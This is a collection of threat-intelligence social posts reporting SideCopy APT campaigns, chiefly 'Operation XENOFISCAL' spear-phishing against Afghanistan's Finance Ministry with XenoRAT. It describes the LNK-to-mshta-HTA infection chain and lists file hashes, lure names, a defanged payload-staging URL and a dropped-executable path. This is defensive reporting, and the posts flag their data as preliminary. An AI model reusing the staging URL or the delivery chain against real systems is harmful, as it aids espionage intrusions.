📰 SideCopy APT Targets Afghanistan's Finance Ministry in 'XENOFISCAL' Espionage Campaign

APT group SideCopy targets Afghanistan's Finance Ministry in 'Operation XENOFISCAL.' The campaign uses Pashto-language spear-phishing lures to deploy the XenoRAT trojan for espionage. 🇵🇰-aligned group continues focus on South Asia. #APT #SideCopy #...

🌐 cyber[.]netsecops[.]io

🔗 https://cyber.netsecops.io/articles/sidecopy-apt-targets-afghanistans-finance-ministry-with-xenorat/…

SideCopy Targets Afghan Finance Ministry with Xeno RAT Malware

Seqrite Labs researchers uncovered a sneaky malware attack, dubbed Operation XENOFISCAL, where the Pakistan-aligned SideCopy group targeted Afghanistan's Ministry of Finance and government officials with a cleverly crafted phishing lure written in Pashto. The attack used Xeno RAT Malware, delivered through a ZIP archive with a malicious…

https://osintsights.com/sidecopy-targets-afghan-finance-ministry-with-xeno-rat-malware?utm_source=mastodon&utm_medium=social

#XenoRatMalware #Sidecopy #Afghanistan #FinanceSector #SpearPhishing

Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan

SideCopy APT, a Pakistan-linked threat group under the Transparent Tribe umbrella, executed a targeted spear phishing campaign against Afghanistan's Ministry of Finance and provincial revenue directorates. The attack begins with a Pashto-language LNK file disguised as a staff directory document, which executes mshta.exe to fetch remote HTA payloads from compromised Afghan education infrastructure. The multi-stage chain deploys obfuscated JavaScript, establishes registry-based persistence mimicking Microsoft Edge, and ultimately delivers XenoRAT 1.8.7 beaconing to bulletproof Bulgarian hosting. The campaign demonstrates precise knowledge of target administrative context, using Dari and Pashto decoy documents listing provincial finance officials with direct contact information. Infrastructure analysis reveals deliberate staging within Afghan government IP space and C2 infrastructure overlapping with previous SideCopy operations.

Pulse ID: 6a196f2fd88de848b913e4da
Pulse Link: https://otx.alienvault.com/pulse/6a196f2fd88de848b913e4da
Pulse Author: AlienVault
Created: 2026-05-29 10:49:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Afghanistan #Bulgaria #CyberSecurity #Edge #Education #Government #InfoSec #Java #JavaScript #LNK #Microsoft #MicrosoftEdge #Mimic #OTX #OpenThreatExchange #Pakistan #Phishing #RAT #SideCopy #SpearPhishing #TransparentTribe #bot #AlienVault

Recorded Future’s Insikt Group recently analyzed a Pakistan's Cyber campain using a new version of the DRAT remote access TROJAN, deployed in a TAG-140 campaign overlapping with the #SideCopy (~APT36) attacks targeting Indian government organizations.

🔗 https://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal

#APT #Sidecopy

49b29596c81892f8fff321ff8d64105a
DMA_Monthly_Update_Minutes_of_Meeting-reg.zip

a52d2a0edccdc0f533c7b04e88fe8092
DocScanner_Updated_letter.pdf.lnk

hxxps://futureuniform.ca/wp/wp-content/files/01/

d0c80705be2bc778c7030aae1087f96e
main.hta

9f5354dcf6e6b5acd4213d9ff77ce07c
C:\Users\Public\stremoe\steistem.exe

InSideCopy: How this APT continues to evolve its arsenal - By Asheer Malhotra and Justin Thattil.

Cisco Talos is tracking an increase in Sid... http://feedproxy.google.com/~r/feedburner/Talos/~3/7sPQPB7nf_U/sidecopy.html #sidecopy #malware #securex #threats #talos #rats #apt